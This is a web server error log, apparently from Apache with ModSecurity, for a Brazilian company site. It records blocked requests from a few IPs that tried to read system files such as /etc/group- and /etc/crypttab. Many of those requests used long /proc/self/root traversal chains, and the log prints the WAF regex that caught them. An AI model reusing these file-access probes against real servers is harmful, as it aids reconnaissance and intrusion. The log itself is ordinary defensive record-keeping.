[Wed Mar 18 04:18:41.591387 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.241.31:39766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpR0fu8EFLIOrSqIpvJmgAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:18:46.567391 2026] [:error] [pid 11816:tid 140411691570944] [client 216.73.216.191:43638] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpR1uw_le52K8_3pV2jBgAAAgY"]
[Wed Mar 18 04:18:47.784655 2026] [mime_magic:error] [pid 17887:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:43726] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 04:19:21.763636 2026] [:error] [pid 31803:tid 140411582465792] [client 216.73.216.191:44576] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpR-eyqAr6etmhZHNp81wAAAFM"]
[Wed Mar 18 04:19:26.705894 2026] [:error] [pid 15826:tid 140411674785536] [client 216.73.216.191:44794] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpR_uoXxyEfFpUF8f8wmQAAAUg"]
[Wed Mar 18 04:20:23.559842 2026] [:error] [pid 31803:tid 140411616036608] [client 216.73.216.191:46164] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSN-yqAr6etmhZHNp8_AAAAE8"]
[Wed Mar 18 04:20:23.897252 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:39780] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSN9a6ubjKNq_cu4ZaVAAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:20:24.063884 2026] [:error] [pid 15051:tid 140411666392832] [client 216.73.216.191:46202] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSOCmAPhZkrhU8w4kxUgAAAIk"]
[Wed Mar 18 04:20:27.507068 2026] [:error] [pid 26799:tid 140411725141760] [client 216.73.216.191:46334] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSO9a6ubjKNq_cu4ZaVQAAA0I"]
[Wed Mar 18 04:20:42.547192 2026] [:error] [pid 29882:tid 140411708356352] [client 216.73.216.191:46728] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSSkzinOy1jxa1j4fWGAAAAQQ"]
[Wed Mar 18 04:20:42.635607 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.241.31:40312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSSvu8EFLIOrSqIpvJ2wAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:20:43.399922 2026] [:error] [pid 15826:tid 140411716749056] [client 216.73.216.191:46776] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSS-oXxyEfFpUF8f8wuQAAAUM"]
[Wed Mar 18 04:20:45.541427 2026] [:error] [pid 11816:tid 140411725141760] [client 216.73.216.191:46814] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSTOw_le52K8_3pV2jhQAAAgI"]
[Wed Mar 18 04:20:55.218956 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.241.31:53408] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSVkzinOy1jxa1j4fWMgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:20:58.126797 2026] [:error] [pid 19507:tid 140411683178240] [client 216.73.216.191:47396] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSWtY0UrI5A3LftIxWhAAAAYc"]
[Wed Mar 18 04:21:00.243985 2026] [:error] [pid 17887:tid 140411658000128] [client 216.73.216.191:47546] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSXAkwaGbbGflqUZDWHgAAAMo"]
[Wed Mar 18 04:21:03.795234 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:47678] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSXuoXxyEfFpUF8f8wxQAAAUw"]
[Wed Mar 18 04:21:06.918973 2026] [:error] [pid 11816:tid 140411649607424] [client 216.73.216.191:47890] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSYuw_le52K8_3pV2jtAAAAgs"]
[Wed Mar 18 04:21:54.066433 2026] [:error] [pid 11816:tid 140411725141760] [client 216.73.216.191:48860] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSkuw_le52K8_3pV2j6QAAAgI"]
[Wed Mar 18 04:21:55.034976 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:59696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSk-yqAr6etmhZHNp9YAAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:22:08.061827 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.244.43:49200] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpSoPu8EFLIOrSqIpvKLgAAAlQ"]
[Wed Mar 18 04:22:09.090900 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.228.61:38448] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpSodY0UrI5A3LftIxWogAAAYo"]
[Wed Mar 18 04:22:12.986039 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:44058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSpPu8EFLIOrSqIpvKNgAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:22:42.820902 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.241.31:46664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSwuw_le52K8_3pV2kQgAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:22:43.202206 2026] [mime_magic:error] [pid 17653:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:48442] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 04:22:48.346087 2026] [:error] [pid 29882:tid 140411641214720] [client 216.73.216.191:50830] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSx0zinOy1jxa1j4fWeAAAAQw"]
[Wed Mar 18 04:22:48.372014 2026] [:error] [pid 31803:tid 140411741927168] [client 216.73.216.191:50838] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpSx-yqAr6etmhZHNp9hgAAAEA"]
[Wed Mar 18 04:23:00.515133 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:41792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS1OoXxyEfFpUF8f8w_gAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:23:01.949148 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.241.31:35000] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS1UzinOy1jxa1j4fWhwAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
